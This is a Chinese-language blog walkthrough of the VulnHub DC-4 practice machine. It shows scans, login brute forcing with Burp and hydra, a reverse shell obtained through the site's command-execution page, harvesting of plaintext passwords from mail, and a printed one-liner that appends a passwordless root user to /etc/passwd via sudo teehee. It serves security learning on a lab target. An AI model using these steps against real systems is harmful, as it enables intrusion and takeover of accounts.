[vulnhub] DC:4

First Post:

Last Update:

Word Count:
3.5k

Read Time:
19 min

97098019_p0

简介

DC-4前面信息收集和web渗透部分就是直接简单粗暴解决,提权部分主要看提权时的信息收集能力。总体来说是台很简单的靶机。

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
┌──(kali㉿kali)-[~/vulnhub/DC/4/workSpace]
└─$ sudo nmap -sn 192.168.56.0/24       
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 14:30 CST
Nmap scan report for 192.168.56.1
Host is up (0.00032s latency).
MAC Address: 0A:00:27:00:00:08 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00030s latency).
MAC Address: 08:00:27:B1:3D:71 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.112
Host is up (0.00029s latency).
MAC Address: 08:00:27:DA:BB:43 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.144
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.29 seconds
                                                                                             
┌──(kali㉿kali)-[~/vulnhub/DC/4/workSpace]
└─$ sudo nmap -p- --min-rate=10000 192.168.56.112
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 14:31 CST
Nmap scan report for 192.168.56.112
Host is up (0.0078s latency).
Not shown: 51829 filtered tcp ports (no-response), 13704 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:DA:BB:43 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 36.26 seconds
                                                                                             
┌──(kali㉿kali)-[~/vulnhub/DC/4/workSpace]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.56.112
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 14:32 CST
Nmap scan report for 192.168.56.112
Host is up (0.0014s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d6057066c27e02f762ce642c001ba25 (RSA)
|   256 e7838cd7bb84f32ee8a25f796f8e1930 (ECDSA)
|_  256 fd39478a5e58339973739e227f904f4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
MAC Address: 08:00:27:DA:BB:43 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.80 seconds
                                                                                             
┌──(kali㉿kali)-[~/vulnhub/DC/4/workSpace]
└─$ sudo nmap --script=vuln 192.168.56.112         
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-01 14:34 CST
Nmap scan report for 192.168.56.112
Host is up (0.014s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.112
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.56.112:80/
|     Form id: 
|     Form action: login.php
|     
|     Path: http://192.168.56.112:80/login.php
|     Form id: 
|_    Form action: login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 08:00:27:DA:BB:43 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 78.64 seconds

nmap一套扫完下来并没给我们带来太多可用信息。主要告诉我们开了22和80端口,以及80端口上跑着nginx 1.15.10服务。

秉持着不遗漏的原则,又用nikto扫一下看看错没错过什么可用漏洞。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~/vulnhub/DC/4/workSpace]
└─$ sudo nikto -h http://192.168.56.112
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.56.112
+ Target Hostname:    192.168.56.112
+ Target Port:        80
+ Start Time:         2023-06-01 14:34:35 (GMT8)
---------------------------------------------------------------------------
+ Server: nginx/1.15.10
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time:           2023-06-01 14:35:01 (GMT8) (26 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

遗憾的是并没有,更遗憾的是nginx 1.15也没找到什么可用的漏洞。

web渗透

查看网站

那就直接看看网页吧

dc4-login

发现网页除了个登录框就啥也没有了。

目录扫描一下看看有没有别的页面。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(kali㉿kali)-[~/vulnhub/DC/4/workSpace]
└─$ sudo dirb http://192.168.56.112    
[sudo] password for kali: 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Jun  1 14:31:42 2023
URL_BASE: http://192.168.56.112/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.112/ ----
==> DIRECTORY: http://192.168.56.112/css/                                                   
==> DIRECTORY: http://192.168.56.112/images/                                                
+ http://192.168.56.112/index.php (CODE:200|SIZE:506)                                       
                                                                                            
---- Entering directory: http://192.168.56.112/css/ ----
                                                                                            
---- Entering directory: http://192.168.56.112/images/ ----
                                                                                            
-----------------
END_TIME: Thu Jun  1 14:31:56 2023
DOWNLOADED: 13836 - FOUND: 1

发现并没有。

再用别的字典以及扩展名找一下:sudo dirsearch -u 192.168.56.112 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,html,txt,zip

然而实际上还是发现不了解别的目录。事已至此,只能爆破了。

爆破

用一下burpsuite。(不用hydra主要是因为这个页面输入错误凭证不会给任何错误提示而是直接跳转,不知道怎么告诉hydra那些是错误的密码)

dc4-bp-bf

简简单单暴个破,字典我用的seclists里面passwords中的500-worst-passwords。

dc4-bf-success

爆破成功,密码是happy。至于为什么下面一些密码全报200,是因为该系统页面登录成功后会给用户设置成功login的session。而之后及时输入错误的密码也将session覆盖成登录失败的session(其实是写了但是被注释掉了),具体代码可以get shell后查看login.php。

RCE

成功登录进后台

dc4-backend

点进command看看,发现可以选择命令执行。

dc-ce

那我们来兴趣了,如果这里能执行我们的命令多好。

抓个包可以发现是用post传参,然后后台执行命令并传回回显。

那我们直接向里面写入我们的反弹shell。(URL编码部分其实就是熟悉的伪设备反弹shell,之所以用URL编码是因为防止&被识别为间隔参数的符号了)

dc4-reverseshell

发现可以成功拿到反弹shell。

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/vulnhub/DC/4/workSpace]
└─$ sudo nc -lvp 443                      
listening on [any] 443 ...
192.168.56.112: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.144] from (UNKNOWN) [192.168.56.112] 37492
bash: cannot set terminal process group (331): Inappropriate ioctl for device
bash: no job control in this shell
www-data@dc-4:/usr/share/nginx/html$

提权

www-data

我们拿到的shell的当前用户是www-data,基本没什么权限。sudo -l不知道密码,看看定时任务也没什么新鲜的,suid位倒是有个有趣的文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
www-data@dc-4:~$ find / -type f -perm -u=s 2>/dev/null
find / -type f -perm -u=s 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
/bin/ping
/home/jim/test.sh

那我们就去看看,可惜只是jim的s位,没啥用。但是在jim的home目录我们发现了backup目录,进去一看就发现了jim的旧密码备份。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
www-data@dc-4:/home/jim$ cd back
cd backups/
www-data@dc-4:/home/jim/backups$ ls -la                
ls -la
total 12
drwxr-xr-x 2 jim jim 4096 Apr  7  2019 .
drwxr-xr-x 3 jim jim 4096 Apr  7  2019 ..
-rw-r--r-- 1 jim jim 2047 Apr  7  2019 old-passwords.bak
www-data@dc-4:/home/jim/backups$ cat old-
cat old-passwords.bak 
000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
qwertyuiop
monkey
123321
dragon
......

这里面有没有可能有jim的密码呢,但是200多条显然不可能一个个试,22端口开着,我们就用hydra爆破一下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali㉿kali)-[~/vulnhub/DC/4/workSpace]
└─$ hydra -l jim -P old-pass ssh://192.168.56.112  
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-01 15:16:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 253 login tries (l:1/p:253), ~16 tries per task
[DATA] attacking ssh://192.168.56.112:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 110 to do in 00:01h, 13 active
[STATUS] 105.50 tries/min, 211 tries in 00:02h, 45 to do in 00:01h, 13 active
[22][ssh] host: 192.168.56.112   login: jim   password: jibril04
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-06-01 15:18:50

发现了jim的登录凭证:jim:jibril04

jim

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(kali㉿kali)-[~/vulnhub/DC/4/workSpace]
└─$ ssh jim@192.168.56.112          
The authenticity of host '192.168.56.112 (192.168.56.112)' can't be established.
ED25519 key fingerprint is SHA256:0CH/AiSnfSSmNwRAHfnnLhx95MTRyszFXqzT03sUJkk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.112' (ED25519) to the list of known hosts.
jim@192.168.56.112's password: 
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$

成功登录。

motd还提示我们有邮件,那我们先看看。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
jim@dc-4:~$ ls
backups  mbox  test.sh
jim@dc-4:~$ cat mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
        (envelope-from <root@dc-4>)
        id 1hCiQe-0000gc-EC
        for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.

此处并没有啥信息。linux下应该还有一个邮件存储位置的来着,但是哪忘了,不过我们可以自己查一下。grep反选掉proc下的文件,主要一般proc下的信息都没啥用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
jim@dc-4:~$ find / -user jim 2>/dev/null | grep -v proc
/run/user/1002
/run/user/1002/gnupg
/run/user/1002/gnupg/S.gpg-agent
/run/user/1002/gnupg/S.gpg-agent.extra
/run/user/1002/gnupg/S.gpg-agent.ssh
/run/user/1002/gnupg/S.gpg-agent.browser
/run/user/1002/systemd
/run/user/1002/systemd/private
/run/user/1002/systemd/notify
/run/user/1002/systemd/transient
/sys/fs/cgroup/systemd/user.slice/user-1002.slice/user@1002.service
/sys/fs/cgroup/systemd/user.slice/user-1002.slice/user@1002.service/tasks
/sys/fs/cgroup/systemd/user.slice/user-1002.slice/user@1002.service/init.scope
/sys/fs/cgroup/systemd/user.slice/user-1002.slice/user@1002.service/init.scope/cgroup.clone_children
/sys/fs/cgroup/systemd/user.slice/user-1002.slice/user@1002.service/init.scope/tasks
/sys/fs/cgroup/systemd/user.slice/user-1002.slice/user@1002.service/init.scope/notify_on_release
/dev/pts/0
/var/mail/jim
/home/jim
/home/jim/mbox
/home/jim/test.sh
/home/jim/new.sh
/home/jim/.profile
/home/jim/backups
/home/jim/backups/old-passwords.bak
/home/jim/.bashrc
/home/jim/.bash_logout
/home/jim/.bash_history

发现是在/var/mail/jim

看一看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
jim@dc-4:~$ cat /var/mail/jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
        (envelope-from <charles@dc-4>)
        id 1hCjIX-0000kO-Qt
        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

发现了charles的密码^xHhA&hvim0y

charles

直接切到charles

1
2
3
4
5
6
7
8
9
jim@dc-4:~$ su charles
Password: 
charles@dc-4:/home/jim$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee

发现其可以无密码执行teehee,teehee是一个linux下的文本编辑器,我们可以在网上查到利用其提权的方法。即利用其向/etc/passwd写入一个gid和uid都为0的无密码用户。在linux里,如果一个用户在passwd和shadow里都没有密码,那我们就可以无密码登录这个用户。这样,我们只要su到这个用户就能获得root权限。

1
2
3
4
5
6
7
charles@dc-4:/home/jim$ echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
test::0:0:::/bin/bash
charles@dc-4:/home/jim$ su test
root@dc-4:/home/jim# whoami
root
root@dc-4:/home/jim# id
uid=0(root) gid=0(root) groups=0(root)

成功提权,检查一下passwd发现确实是如此实现的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
root@dc-4:/home/jim# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
nginx:x:107:111:nginx user,,,:/nonexistent:/bin/false
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
Debian-exim:x:108:112::/var/spool/exim4:/bin/false
test::0:0:::/bin/bash

root

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
root@dc-4:/home/jim# cd /root
root@dc-4:/root# ls -la
total 28
drwx------  3 root root 4096 Apr  7  2019 .
drwxr-xr-x 21 root root 4096 Apr  5  2019 ..
-rw-------  1 root root   16 Apr  7  2019 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  976 Apr  6  2019 flag.txt
drwxr-xr-x  2 root root 4096 Apr  6  2019 .nano
-rw-r--r--  1 root root  148 Aug 18  2015 .profile
root@dc-4:/root# cat flag.txt



888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

拿到flag。